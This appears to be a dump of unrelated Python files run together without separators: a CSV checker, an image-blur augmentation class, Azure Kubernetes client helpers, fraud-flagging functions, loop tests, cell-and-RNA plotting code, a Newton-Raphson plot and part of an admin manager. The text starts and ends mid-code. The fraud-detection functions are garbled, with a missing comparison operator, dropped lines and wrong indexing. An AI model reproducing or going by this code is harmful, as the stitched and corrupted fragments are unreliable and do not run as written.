Please put 'category in the first column") X = df.iloc[:, 1:].values y = df['category'].values print('Successful!') print('Feature names: ', names) print('Feature category: ', np.unique(y)) print('Feature value: ', X) except Exception as error: print("Error: " + repr(error) ) if __name__ == "__main__": check_csv_file(csv_file_name)catalyst/contrib/mixin/blur.py from typing import List import random import numpy as np import albumentations as A class BlurMixin: """ Calculates blur factor for augmented image """ def __init__( self, input_key: str = "image", output_key: str = "blur_factor", blur_min: int = 3, blur_max: int = 9, blur: List[str] = None ): """ Args: input_key (str): input key to use from annotation dict output_key (str): output key to use to store the result """ self.input_key = input_key self.output_key = output_key self.blur_min = blur_min self.blur_max = blur_max blur = blur or ["Blur"] self.blur = [A.__dict__[x]() for x in blur] self.num_blur = len(self.blur) self.num_blur_classes = blur_max - blur_min + 1 + 1 self.blur_probability = \ (self.num_blur_classes - 1) / self.num_blur_classes def __call__(self, dictionary): image = dictionary[self.input_key] blur_factor = 0 if random.random() < self.blur_probability: blur_fn = np.random.choice(self.blur) blur_factor = int( np.random.randint(self.blur_min, self.blur_max) - self.blur_min + 1 ) image = blur_fn.apply(image=image, ksize=blur_factor) dictionary[self.input_key] = image dictionary[self.output_key] = blur_factor return dictionary import sys from azure.mgmt.hybridkubernetes import ConnectedKubernetesClient # This function returns the python client to interact with resources under the namespace 'Microsoft.Kubernetes' def get_connected_kubernetes_client(credential, subscription_id): return ConnectedKubernetesClient(credential, subscription_id) # This function returns the python client to interact with the connected cluster resource def get_connected_cluster_client(credential, subscription_id): try: return get_connected_kubernetes_client(credential, subscription_id).connected_cluster except Exception as e: sys.exit("Error occured while creating connected cluster client: " + str(e)) # This function returns a connected cluster object present in a given resource group def get_connected_cluster(cc_client, resource_group_name, cluster_name): try: return cc_client.get(resource_group_name, cluster_name) except Exception as e: sys.exit("Error occured while fetching the connected cluster resource: " + str(e))def convert_time_format(time_str): #import re time_str=re.sub("[^0-9]", "", time_str) #convert to int return int(time_str); def removeBlanks(data_set): dataset_no_blanks=[] for i in range(len(data_set)): for j in range(len(data_set.feature)): if data_set[i][j]=="": break dataset_no_blanks.append(data_set[i][j]) return dataset_no_blanks def fast_transaction(data_sets): # data_sets[i][1] # data_sets[i].features[2 sorted_data_sets = sorted(data_sets, key=lambda x: x.features[1], reverse=True) prev_data_set=sorted_data_sets[0]; for i in range(1,len(sorted_data_sets)): if prev_data_set.features[2] == sorted_data_sets[i].features[2] & prev_data_set[i].features[1] == sorted_data_sets[i].features[1]: sorted_data_sets[i].fraud="fast_trans" else: sorted_data_sets[i].fraud="none" prev_data_set=sorted_data_sets[i] return sorted_data_sets; def over_limit_transaction(data_sets): for i in range(0,len(data_sets)): if data_sets[i].features[14] 3: for j in range(0,count): if customer_trans[i-j].fraud!="inc": customer_trans[i-j].fraud="inc" def 
polling_fraud_flags(k, data_sets): poll=[0,0,0,0] for i in range(len(data_sets)): if data_sets[i].fraud != "none": poll[data_sets[i].cluster]=poll[data_sets[i].cluster]+1 return poll tests/py2many/loop.py def for_with_break(): for i in range(4): if i == 2: break print(i) def for_with_continue(): for i in range(4): if i == 2: continue print(i) def for_with_else(): for i in range(4): print(i) else: print("OK") def while_with_break(): i = 0 while True: if i == 2: break print(i) i += 1 def while_with_continue(): i = 0 while i < 5: i += 1 if i == 2: continue print(i) for_with_break() for_with_continue() # https://github.com/adsharma/py2many/issues/415 # for_with_else() while_with_break() while_with_continue() # -*- coding: utf-8 -*- """ Functions to plot nucleus, cytoplasm and RNA coordinates. """ import bigfish.stack as stack import matplotlib.pyplot as plt import numpy as np from .utils import save_plot, get_minmax_values from skimage.segmentation import find_boundaries from matplotlib.colors import ListedColormap def plot_volume(data_cell, id_cell, framesize=(7, 7), path_output=None, ext="png"): """Plot Cytoplasm and nucleus borders. Parameters ---------- data_cell : pandas.DataFrame Dataframe with the coordinates of the cell. id_cell : int Id of the cell volume to plot. framesize : tuple Size of the frame used to plot with 'plt.figure(figsize=framesize)'. path_output : str Path to save the image (without extension). ext : str or List[str] Extension used to save the plot. If it is a list of strings, the plot will be saved several times. Returns ------- """ # TODO Sanity check of the dataframe # get cloud points cyto = data_cell.loc[id_cell, "pos_cell"] cyto = np.array(cyto) nuc = data_cell.loc[id_cell, "pos_nuc"] nuc = np.array(nuc) # plot plt.figure(figsize=framesize) plt.plot(cyto[:, 1], cyto[:, 0], c="black", linewidth=2) plt.plot(nuc[:, 1], nuc[:, 0], c="steelblue", linewidth=2) plt.title("Cell id: {}".format(id_cell), fontweight="bold", fontsize=15) plt.tight_layout() save_plot(path_output, ext) plt.show() return def plot_rna(data_merged, id_cell, framesize=(7, 7), path_output=None, ext="png"): """Plot cytoplasm border and RNA spots. Parameters ---------- data_merged : pandas.DataFrame Dataframe with the coordinate of the cell and those of the RNA. id_cell : int ID of the cell to plot. framesize : tuple Size of the frame used to plot with 'plt.figure(figsize=framesize)'. path_output : str Path to save the image (without extension). ext : str or List[str] Extension used to save the plot. If it is a list of strings, the plot will be saved several times. Returns ------- """ # TODO Sanity check of the dataframe # get cloud points cyto = data_merged.loc[id_cell, "pos_cell"] cyto = np.array(cyto) rna = data_merged.loc[id_cell, "RNA_pos"] rna = np.array(rna) # plot plt.figure(figsize=framesize) plt.plot(cyto[:, 1], cyto[:, 0], c="black", linewidth=2) plt.scatter(rna[:, 1], rna[:, 0], c="firebrick", s=50, marker="x") plt.title("Cell id: {}".format(id_cell), fontweight="bold", fontsize=15) plt.tight_layout() save_plot(path_output, ext) plt.show() return def plot_distribution_rna(data, data_validation=None, data_test=None, framesize=(10, 5), path_output=None, ext="png"): """Plot RNA distribution. Parameters ---------- data : pandas.DataFrame Dataframe with all the data (or the train data in case of split data). data_validation : pandas.DataFrame Dataframe with the validation data data_test : pandas.DataFrame Dataframe with the test data. 
framesize : tuple Size of the frame used to plot with 'plt.figure(figsize=framesize)'. path_output : str Path to save the image (without extension). ext : str or List[str] Extension used to save the plot. If it is a list of strings, the plot will be saved several times. Returns ------- """ # plot one histogram if data_validation is None and data_test is None: plt.figure(figsize=framesize) plt.title("RNA distribution", fontweight="bold") plt.hist(data["nb_rna"], bins=100, color="steelblue", edgecolor='black', linewidth=1.2) plt.xlabel("Number of RNA") plt.ylabel("Frequency") plt.tight_layout() save_plot(path_output, ext) plt.show() # plot several histograms elif data_validation is not None and data_test is not None: fig, ax = plt.subplots(3, 1, sharex="col", figsize=framesize) ax[0].hist(data["nb_rna"], bins=100, color="steelblue", edgecolor='black', linewidth=1.2) ax[0].set_title("RNA distribution (train)", fontweight="bold", fontsize=15) ax[0].set_ylabel("Frequency") ax[1].hist(data_validation["nb_rna"], bins=100, color="steelblue", edgecolor='black', linewidth=1.2) ax[1].set_title("RNA distribution (validation)", fontweight="bold", fontsize=15) ax[1].set_ylabel("Frequency") ax[2].hist(data_test["nb_rna"], bins=100, color="steelblue", edgecolor='black', linewidth=1.2) ax[2].set_title("RNA distribution (test)", fontweight="bold", fontsize=15) ax[2].set_ylabel("Frequency") ax[2].set_xlabel("Number of RNA") plt.tight_layout() save_plot(path_output, ext) plt.show() return def plot_cell_coordinates(data, id_cell, title=None, framesize=(5, 10), path_output=None, ext="png"): """ Parameters ---------- data : pandas.DataFrame Dataframe with all the data. id_cell : int Index of the cell to plot title : str Title of the plot framesize : tuple Size of the frame used to plot with 'plt.figure(figsize=framesize)'. path_output : str Path to save the image (without extension). ext : str or List[str] Extension used to save the plot. If it is a list of strings, the plot will be saved several times. Returns ------- """ # get the cytoplasm, the nuclei and the rna spots rna_coord, cyt_coord, nuc_coord = stack.get_coordinates(data, id_cell) # plot plt.figure(figsize=framesize) if title is not None: plt.title(title, fontweight="bold", fontsize=25) plt.plot(cyt_coord[:, 1], cyt_coord[:, 0], c="black", linewidth=2) plt.plot(nuc_coord[:, 1], nuc_coord[:, 0], c="steelblue", linewidth=2) plt.scatter(rna_coord[:, 1], rna_coord[:, 0], s=25, c="firebrick", marker=".") plt.tight_layout() save_plot(path_output, ext) plt.show() return def plot_layers_coordinates(layers, titles=None, framesize=(5, 10), path_output=None, ext="png"): """Plot input layers of the classification model. Parameters ---------- layers : List[np.ndarray] List of the input images feed into the model. titles : List[str] List of the subtitles. framesize : tuple Size of the frame used to plot with 'plt.figure(figsize=framesize)'. path_output : str Path to save the image (without extension). ext : str or List[str] Extension used to save the plot. If it is a list of strings, the plot will be saved several times. 
Returns ------- """ # plot fig, ax = plt.subplots(1, 3, figsize=framesize) ax[0].imshow(layers[0], cmap="binary", origin='lower') ax[1].imshow(layers[1], cmap="binary", origin='lower') ax[2].imshow(layers[2], cmap="binary", origin='lower') if titles is not None: ax[0].set_title(titles[0], fontweight="bold", fontsize=15) ax[1].set_title(titles[1], fontweight="bold", fontsize=15) ax[2].set_title(titles[2], fontweight="bold", fontsize=15) plt.tight_layout() save_plot(path_output, ext) plt.show() return def plot_extraction_image(results, remove_frame=False, title=None, framesize=None, path_output=None, ext="png", show=True): """Plot or subplot of 2-d coordinates extracted from an image. Parameters ---------- results : List[(cyt_coord, nuc_coord, rna_coord, cell_foci, cell)] - cyt_coord : np.ndarray, np.int64 Coordinates of the cytoplasm border with shape (nb_points, 2). - nuc_coord : np.ndarray, np.int64 Coordinates of the nuclei border with shape (nb_points, 2). - rna_coord : np.ndarray, np.int64 Coordinates of the RNA spots with shape (nb_spots, 3). One coordinate per dimension (yx dimension), plus the index of a potential foci. - cell_foci : np.ndarray, np.int64 Array with shape (nb_foci, 7). One coordinate per dimension for the foci centroid (zyx coordinates), the number of RNAs detected in the foci, its index, the area of the foci region and its maximum intensity value. - cell : Tuple[int] Box coordinate of the cell in the original image (min_y, min_x, max_y and max_x). remove_frame : bool Remove axes and frame. title : str Title of the image. framesize : tuple Size of the frame used to plot with 'plt.figure(figsize=framesize)'. path_output : str Path to save the image (without extension). ext : str or List[str] Extension used to save the plot. If it is a list of strings, the plot will be saved several times. show : bool Show the figure or not. 
Returns ------- """ # check parameters stack.check_parameter(results=list, remove_frame=bool, title=(str, type(None)), framesize=(tuple, type(None)), path_output=(str, type(None)), ext=(str, list)) # we plot 3 images by row maximum nrow = int(np.ceil(len(results)/3)) ncol = min(len(results), 3) if framesize is None: framesize = (5 * ncol, 5 * nrow) # plot one image marge = stack.get_offset_value() if len(results) == 1: cyt, nuc, rna, foci, _ = results[0] if remove_frame: fig = plt.figure(figsize=(8, 8), frameon=False) ax = fig.add_axes([0, 0, 1, 1]) ax.axis('off') else: plt.figure(figsize=(8, 8)) plt.xlim(-marge, max(cyt[:, 1]) + marge) plt.ylim(max(cyt[:, 0]) + marge, -marge) plt.scatter(cyt[:, 1], cyt[:, 0], c="black", s=5, marker=".") plt.scatter(nuc[:, 1], nuc[:, 0], c="steelblue", s=5, marker=".") plt.scatter(rna[:, 1], rna[:, 0], c="firebrick", s=50, marker="x") if len(foci) > 0: plt.scatter(foci[:, 2], foci[:, 1], c="chartreuse", s=60, marker="D") if title is not None and not remove_frame: title_plot = title + "_cell_0" plt.title(title_plot, fontweight="bold", fontsize=25) if not remove_frame: plt.tight_layout() if path_output is not None: save_plot(path_output, ext) if show: plt.show() else: plt.close() return # plot multiple images fig, ax = plt.subplots(nrow, ncol, figsize=framesize) # one row if len(results) in [2, 3]: for i, (cyt, nuc, rna, foci, _) in enumerate(results): if remove_frame: ax[i].axis("off") ax[i].set_xlim(-marge, max(cyt[:, 1]) + marge) ax[i].set_ylim(max(cyt[:, 0]) + marge, -marge) ax[i].scatter(cyt[:, 1], cyt[:, 0], c="black", s=5, marker=".") ax[i].scatter(nuc[:, 1], nuc[:, 0], c="steelblue", s=5, marker=".") ax[i].scatter(rna[:, 1], rna[:, 0], c="firebrick", s=50, marker="x") if len(foci) > 0: ax[i].scatter(foci[:, 2], foci[:, 1], c="chartreuse", s=60, marker="D") if title is not None: title_plot = title + "_cell_{0}".format(i) ax[i].set_title(title_plot, fontweight="bold", fontsize=10) # several rows else: # we complete the row with empty frames r = nrow * 3 - len(results) results_completed = [(cyt, nuc, rna, foci, _) for (cyt, nuc, rna, foci, _) in results] results_completed += [None] * r for i, result in enumerate(results_completed): row = i // 3 col = i % 3 if result is None: ax[row, col].set_visible(False) continue else: cyt, nuc, rna, foci, cell = result if remove_frame: ax[row, col].axis("off") ax[row, col].set_xlim(-marge, max(cyt[:, 1]) + marge) ax[row, col].set_ylim(max(cyt[:, 0]) + marge, -marge) ax[row, col].scatter(cyt[:, 1], cyt[:, 0], c="black", s=5, marker=".") ax[row, col].scatter(nuc[:, 1], nuc[:, 0], c="steelblue", s=5, marker=".") ax[row, col].scatter(rna[:, 1], rna[:, 0], c="firebrick", s=50, marker="x") if len(foci) > 0: ax[row, col].scatter(foci[:, 2], foci[:, 1], c="chartreuse", s=60, marker="D") if title is not None: title_plot = title + "_cell_{0}".format(i) ax[row, col].set_title(title_plot, fontweight="bold", fontsize=10) plt.tight_layout() if path_output is not None: save_plot(path_output, ext) if show: plt.show() else: plt.close() return def plot_cell(cyt_coord, nuc_coord=None, rna_coord=None, foci_coord=None, image_cyt=None, mask_cyt=None, mask_nuc=None, count_rna=False, title=None, remove_frame=False, rescale=False, framesize=(15, 10), path_output=None, ext="png", show=True): """ Plot image and coordinates extracted for a specific cell. Parameters ---------- cyt_coord : np.ndarray, np.int64 Coordinates of the cytoplasm border with shape (nb_points, 2). 
nuc_coord : np.ndarray, np.int64 Coordinates of the nuclei border with shape (nb_points, 2). rna_coord : np.ndarray, np.int64 Coordinates of the RNA spots with shape (nb_spots, 4). One coordinate per dimension (zyx dimension), plus the index of a potential foci. foci_coord : np.ndarray, np.int64 Array with shape (nb_foci, 5). One coordinate per dimension for the foci centroid (zyx coordinates), the number of RNAs detected in the foci and its index. image_cyt : np.ndarray, np.uint Original image of the cytoplasm. mask_cyt : np.ndarray, np.uint Mask of the cytoplasm. mask_nuc : np.ndarray, np.uint Mask of the nucleus. count_rna : bool Display the number of RNAs in a foci. title : str Title of the image. remove_frame : bool Remove axes and frame. rescale : bool Rescale pixel values of the image (made by default in matplotlib). framesize : tuple Size of the frame used to plot with 'plt.figure(figsize=framesize)'. path_output : str Path to save the image (without extension). ext : str or List[str] Extension used to save the plot. If it is a list of strings, the plot will be saved several times. show : bool Show the figure or not. Returns ------- """ # TODO recode it # check parameters stack.check_array(cyt_coord, ndim=2, dtype=[np.int64]) if nuc_coord is not None: stack.check_array(nuc_coord, ndim=2, dtype=[np.int64]) if rna_coord is not None: stack.check_array(rna_coord, ndim=2, dtype=[np.int64]) if foci_coord is not None: stack.check_array(foci_coord, ndim=2, dtype=[np.int64]) if image_cyt is not None: stack.check_array(image_cyt, ndim=2, dtype=[np.uint8, np.uint16, np.int64]) if mask_cyt is not None: stack.check_array(mask_cyt, ndim=2, dtype=[np.uint8, np.uint16, np.int64, bool]) if mask_nuc is not None: stack.check_array(mask_nuc, ndim=2, dtype=[np.uint8, np.uint16, np.int64, bool]) stack.check_parameter(count_rna=bool, title=(str, type(None)), remove_frame=bool, rescale=bool, framesize=tuple, path_output=(str, type(None)), ext=(str, list)) if title is None: title = "" else: title = " ({0})".format(title) # get shape of image built from coordinates marge = stack.get_offset_value() max_y = cyt_coord[:, 0].max() + 2 * marge + 1 max_x = cyt_coord[:, 1].max() + 2 * marge + 1 image_shape = (max_y, max_x) # get cytoplasm layer cyt = np.zeros(image_shape, dtype=bool) cyt[cyt_coord[:, 0] + marge, cyt_coord[:, 1] + marge] = True # get nucleus layer nuc = np.zeros(image_shape, dtype=bool) if nuc_coord is not None: nuc[nuc_coord[:, 0] + marge, nuc_coord[:, 1] + marge] = True # get rna layer rna = np.zeros(image_shape, dtype=bool) if rna_coord is not None: rna[rna_coord[:, 1] + marge, rna_coord[:, 2] + marge] = True rna = stack.dilation_filter(rna, kernel_shape="square", kernel_size=3) # get foci layer foci = np.zeros(image_shape, dtype=bool) if foci_coord is not None: rna_in_foci_coord = rna_coord[rna_coord[:, 3] != -1, :].copy() foci[rna_in_foci_coord[:, 1] + marge, rna_in_foci_coord[:, 2] + marge] = True foci = stack.dilation_filter(foci, kernel_shape="square", kernel_size=3) # build image coordinate image_coord = np.ones((max_y, max_x, 3), dtype=np.float32) image_coord[cyt, :] = [0, 0, 0] # black image_coord[nuc, :] = [0, 102 / 255, 204 / 255] # blue image_coord[rna, :] = [204 / 255, 0, 0] # red image_coord[foci, :] = [102 / 255, 204 / 255, 0] # green # plot original and coordinate image if image_cyt is not None: fig, ax = plt.subplots(1, 2, sharex='col', figsize=framesize) # original image if remove_frame: ax[0].axis("off") if not rescale: vmin, vmax = get_minmax_values(image_cyt) 
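# With rescale=False the display range is pinned to the values returned by
# get_minmax_values() and passed explicitly to imshow() below, instead of
# letting matplotlib autoscale the contrast for each image.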
ax[0].imshow(image_cyt, vmin=vmin, vmax=vmax) else: ax[0].imshow(image_cyt) if mask_cyt is not None: boundaries_cyt = find_boundaries(mask_cyt, mode='inner') boundaries_cyt = np.ma.masked_where(boundaries_cyt == 0, boundaries_cyt) ax[0].imshow(boundaries_cyt, cmap=ListedColormap(['red'])) if mask_nuc is not None: boundaries_nuc = find_boundaries(mask_nuc, mode='inner') boundaries_nuc = np.ma.masked_where(boundaries_nuc == 0, boundaries_nuc) ax[0].imshow(boundaries_nuc, cmap=ListedColormap(['blue'])) ax[0].set_title("Original image" + title, fontweight="bold", fontsize=10) # coordinate image if remove_frame: ax[1].axis("off") ax[1].imshow(image_coord) if count_rna and foci_coord is not None: for (_, y, x, nb_rna, _) in foci_coord: ax[1].text(x+5, y-5, str(nb_rna), color="#66CC00", size=20) ax[1].set_title("Coordinate image" + title, fontweight="bold", fontsize=10) plt.tight_layout() # plot coordinate image only else: if remove_frame: fig = plt.figure(figsize=framesize, frameon=False) ax = fig.add_axes([0, 0, 1, 1]) ax.axis('off') else: plt.figure(figsize=framesize) plt.title("Coordinate image" + title, fontweight="bold", fontsize=25) plt.imshow(image_coord) if count_rna and foci_coord is not None: for (_, y, x, nb_rna, _) in foci_coord: plt.text(x+5, y-5, str(nb_rna), color="#66CC00", size=20) if not remove_frame: plt.tight_layout() if path_output is not None: save_plot(path_output, ext) if show: plt.show() else: plt.close() return import matplotlib.pyplot as plt import numpy as np from matplotlib import rc __author__ = 'ernesto' # if use latex or mathtext rc('text', usetex=True) rc('mathtext', fontset='cm') def fun_g(x): return np.exp(-np.square(x) / 2) + 0.1 * np.exp(-np.square(x-10) / 2) def fun_g_derivative(x): return -x * np.exp(-np.square(x) / 2) - 0.1 * (x - 10) * np.exp(-np.square(x - 10) / 2) def fun_g_second_derivative(x): return (np.square(x) - 1) * np.exp(-np.square(x) / 2) \ + 0.1 * (np.square(x - 10) - 1) * np.exp(-np.square(x - 10) / 2) def newton_raphson(x0, nsteps): x_vals = np.zeros((nsteps+1,)) i = 0 x_vals[i] = x0 for i in np.arange(1, nsteps+1): x_vals[i] = x_vals[i-1] - fun_g_derivative(x_vals[i-1]) / fun_g_second_derivative(x_vals[i-1]) return x_vals # abscissa values xmin = -3 xmax = 13 x = np.linspace(xmin, xmax, 300) # normal distribution and density values in x g = fun_g(x) g_derivative = fun_g_derivative(x) nsteps = 20 x01 = 0.7 xn1 = newton_raphson(x01, nsteps) x02 = 1.5 xn2 = newton_raphson(x02, nsteps) x03 = 9.5 xn3 = newton_raphson(x03, nsteps) print(xn2) # axis parameters dx = 0.5 xmin_ax = xmin - dx xmax_ax = xmax + dx # para la grafica de g(x) ymax_ax1 = 1.2 ymin_ax1 = -0.2 # para la grafica de g'(x) ymax_ax2 = 0.7 ymin_ax2 = -0.7 # x ticks labels margin xtm = -0.13 ytm = 0.3 # font size fontsize = 14 # colors from coolwarm col1 = 'r' col2 = 'deepskyblue' col3 = 'green' fig = plt.figure(0, figsize=(9, 6), frameon=False) # grafica de g(x) ax = plt.subplot2grid((2, 1), (0, 0), rowspan=1, colspan=1) plt.xlim(xmin_ax, xmax_ax) plt.ylim(ymin_ax1, ymax_ax1) # axis arrows plt.annotate("", xytext=(xmin_ax, 0), xycoords='data', xy=(xmax_ax, 0), textcoords='data', arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002)) plt.annotate("", xytext=(0, ymin_ax1), xycoords='data', xy=(0, ymax_ax1), textcoords='data', arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002)) plt.plot(x, g, 'k', linewidth=2) plt.plot(xn1, fun_g(xn1), '.', color=col1, markersize=9, label='$x_0={:.1f}$'.format(x01)) plt.plot(xn2, 
fun_g(xn2), '.', color=col2, markersize=9, label='$x_0={:.1f}$'.format(x02)) plt.plot(xn3, fun_g(xn3), '.', color=col3, markersize=9, label='$x_0={:.1f}$'.format(x03)) plt.plot(np.array([xn1[0:4], xn1[0:4]]), np.array([np.zeros((4,)), fun_g(xn1[0:4])]), '--', color=col1, lw=1) xm = -0.18 plt.annotate(r'$x_0$', xytext=(xn1[0]+0.5, xm), xycoords='data', xy=(xn1[0], 0), textcoords='data', color=col1, fontsize=fontsize, va="baseline", ha="right", arrowprops=dict(arrowstyle="-|>, head_width=0.15, head_length=0.3", color=col1, relpos=(0.2, 1), patchA=None, patchB=None, shrinkA=1, shrinkB=1)) plt.annotate(r'$x_2$', xytext=(xn1[2]-0.4, xm), xycoords='data', xy=(xn1[2], 0), textcoords='data', color=col1, fontsize=fontsize, va="baseline", ha="left", arrowprops=dict(arrowstyle="-|>, head_width=0.15, head_length=0.3", color=col1, relpos=(0.5, 1), patchA=None, patchB=None, shrinkA=1, shrinkB=1)) plt.annotate(r'$x_1$', xytext=(xn1[1]-0.3, xm), xycoords='data', xy=(xn1[1], 0), textcoords='data', color=col1, fontsize=fontsize, va="baseline", ha="right", arrowprops=dict(arrowstyle="-|>, head_width=0.15, head_length=0.3", color=col1, relpos=(0.8, 1), patchA=None, patchB=None, shrinkA=1, shrinkB=1)) plt.annotate(r'$x_3$', xytext=(xn1[3]-0.1, xm), xycoords='data', xy=(xn1[3], 0), textcoords='data', color=col1, fontsize=fontsize, va="baseline", ha="right", arrowprops=dict(arrowstyle="-|>, head_width=0.15, head_length=0.3", color=col1, relpos=(0.6, 1), patchA=None, patchB=None, shrinkA=1, shrinkB=1)) plt.plot([xn2[0], xn2[0]], [0, fun_g(xn2[0])], '--', color=col2, lw=1) plt.text(xn2[0]+0.1, xtm, '$x_0$', color=col2, fontsize=fontsize, ha='center', va='baseline') plt.plot([xn3[0], xn3[0]], [0, fun_g(xn3[0])], '--', color=col3, lw=1) plt.text(xn3[0], xtm, '$x_0$', color=col3, fontsize=fontsize, ha='center', va='baseline') plt.text(ytm, ymax_ax1, '$g(x)$', fontsize=fontsize, ha='left', va='center') plt.text(xmax_ax, xtm, '$x$', fontsize=fontsize, ha='center', va='baseline') ax.spines['right'].set_visible(False) ax.spines['top'].set_visible(False) ax.tick_params(labelsize=10) ax.legend(fontsize=fontsize, framealpha=0) # grafica de g'(x) ax = plt.subplot2grid((2, 1), (1, 0), rowspan=1, colspan=1) plt.xlim(xmin_ax, xmax_ax) plt.ylim(ymin_ax2, ymax_ax2) # axis arrows plt.annotate("", xytext=(xmin_ax, 0), xycoords='data', xy=(xmax_ax, 0), textcoords='data', arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002)) plt.annotate("", xytext=(0, ymin_ax2), xycoords='data', xy=(0, ymax_ax2), textcoords='data', arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002)) plt.plot(x, g_derivative, 'k', linewidth=2) plt.plot(xn1, fun_g_derivative(xn1), '.', color=col1, markersize=9) plt.plot(xn2, fun_g_derivative(xn2), '.', color=col2, markersize=9) plt.plot(xn3, fun_g_derivative(xn3), '.', color=col3, markersize=9) plt.plot(xn1[0:2], [fun_g_derivative(xn1[0]), 0], color=col1, lw=1) plt.plot(xn1[1:3], [fun_g_derivative(xn1[1]), 0], color=col1, lw=1) plt.plot(xn1[2:4], [fun_g_derivative(xn1[2]), 0], color=col1, lw=1) plt.plot(np.array([xn1[0:4], xn1[0:4]]), np.array([np.zeros((4,)), fun_g_derivative(xn1[0:4])]), '--', color=col1, lw=1) plt.text(xn1[0]+0.1, -xtm, '$x_0$', color=col1, fontsize=fontsize, ha='center', va='top') plt.plot([xn2[0], xn2[0]], [0, fun_g_derivative(xn2[0])], '--', color=col2, lw=1) plt.text(xn2[0], -xtm, '$x_0$', color=col2, fontsize=fontsize, ha='center', va='top') plt.plot([xn3[0], xn3[0]], [0, fun_g_derivative(xn3[0])], '--', color=col3, lw=1) 
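# newton_raphson() above iterates x_{k+1} = x_k - g'(x_k) / g''(x_k), i.e.
# Newton's method applied to the stationarity condition g'(x) = 0 (root finding
# on g'(x), shown in the lower panel). g(x) has two local maxima, near x = 0 and
# x = 10, and the three starting points x0 = 0.7, 1.5 and 9.5 are drawn in
# different colors to show how the sequence of iterates depends on where the
# iteration is started.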
plt.text(xn3[0], xtm, '$x_0$', color=col3, fontsize=fontsize, ha='center', va='baseline') plt.text(ytm, ymax_ax2, '$g\'(x)$', fontsize=fontsize, ha='left', va='center') plt.text(xmax_ax, xtm, '$x$', fontsize=fontsize, ha='center', va='baseline') ax.spines['right'].set_visible(False) ax.spines['top'].set_visible(False) ax.tick_params(labelsize=10) # save as pdf image plt.savefig('problem_7_18.pdf', bbox_inches='tight') plt.show() src/pyrin/admin/manager.py # -*- coding: utf-8 -*- """ admin manager module. """ from copy import deepcopy import pyrin.utils.dictionary as dict_utils import pyrin.configuration.services as config_services import pyrin.database.paging.services as paging_services import pyrin.database.services as database_services import pyrin.globalization.datetime.services as datetime_services import pyrin.globalization.locale.services as locale_services import pyrin.security.authentication.services as authentication_services from pyrin.core.globals import _ from pyrin.admin import AdminPackage from pyrin.core.structs import Context, Manager from pyrin.admin.interface import AbstractAdminPage from pyrin.security.enumerations import InternalAuthenticatorEnum from pyrin.admin.enumerations import ListFieldTypeEnum, FormFieldTypeEnum from pyrin.admin.exceptions import InvalidAdminPageTypeError, DuplicatedAdminPageError, \ AdminPageNotFoundError, AdminOperationNotAllowedError, AdminPagesHaveNotLoadedError class AdminManager(Manager): """ admin manager class. """ package_class = AdminPackage def __init__(self, **options): """ initializes an instance of AdminManager. """ super().__init__() # a dict containing all registered admin pages in the form of: # {str register_name: AbstractAdminPage instance} self._admin_pages = Context() # a dict containing all registered admin pages for different entity types. # in the form of: # {BaseEntity entity: AbstractAdminPage instance} self._admin_entities = Context() # a tuple of all available admin pages metadata sorted by category and name. # in the form of: # ({str category: [dict admin_metadata]}) self._admin_metadata = None # a dict containing a map between all form field types and list field types. # for example: {str form_field_type: str list_field_type} self._type_map = self._get_form_to_list_type_map() self._base_url = self._load_base_url() # shared admin panel configs required for client. self._configs = None def _get_form_to_list_type_map(self): """ gets the type map for different form fields to list fields. **NOTE:** as the client side table does not format the numeric values correctly, we have to introduce numeric values as string to the client to keep the behavior of these column types as others. 
:rtype: dict """ result = Context() result[FormFieldTypeEnum.BOOLEAN] = ListFieldTypeEnum.BOOLEAN result[FormFieldTypeEnum.DATE] = ListFieldTypeEnum.DATE result[FormFieldTypeEnum.DATETIME] = ListFieldTypeEnum.DATETIME result[FormFieldTypeEnum.TIME] = ListFieldTypeEnum.TIME result[FormFieldTypeEnum.EMAIL] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.FILE] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.NUMBER] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.INTEGER] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.FLOAT] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.PASSWORD] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.TELEPHONE] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.STRING] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.TEXT] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.URL] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.UUID] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.IPV4] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.IPV6] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.OBJECT] = ListFieldTypeEnum.OBJECT return result def _load_base_url(self): """ loads admin base url from `admin` config store. :rtype: str """ url = config_services.get_active('admin', 'url') if not url.endswith('/'): url = f'{url}/' return url def _remove_from_pages(self, register_name): """ removes the admin page with given register name from admin pages. it returns the removed admin page. :param str register_name: register name of the admin page to be removed. :rtype: pyrin.admin.interface.AbstractAdminPage """ instance = self._admin_pages.pop(register_name, None) if instance is not None: return self._remove_from_entities(instance.get_entity()) return instance def _remove_from_entities(self, entity): """ removes the admin page with given entity from admin entities. it returns the removed admin page. :param type[pyrin.database.model.base.BaseEntity] entity: the entity class of admin page to be removed. :rtype: pyrin.admin.interface.AbstractAdminPage """ instance = self._admin_entities.pop(entity, None) if instance is not None: return self._remove_from_pages(instance.get_register_name()) return None def _get_admin_page(self, register_name): """ gets the admin page with given register name. :param str register_name: register name of admin page to be get. this name is case-insensitive. :raises AdminPageNotFoundError: admin page not found error. :rtype: pyrin.admin.interface.AbstractAdminPage """ name = str(register_name).lower() if name not in self._admin_pages: raise AdminPageNotFoundError(_('Admin page [{name}] not found.') .format(name=name)) return self._admin_pages.get(name) def try_get_admin_page(self, entity): """ gets the admin page for given entity class. it returns None if admin page does not exist. :param type[pyrin.database.model.base.BaseEntity] entity: the entity class of admin page to be get. :rtype: pyrin.admin.interface.AbstractAdminPage """ return self._admin_entities.get(entity) def is_admin_enabled(self): """ gets a value indicating that admin api is enabled. :rtype: bool """ return config_services.get_active('admin', 'enabled') def has_admin(self, entity): """ gets a value indicating that given entity class has admin page. :param type[pyrin.database.model.base.BaseEntity] entity: entity class. :rtype: bool """ return entity in self._admin_entities def 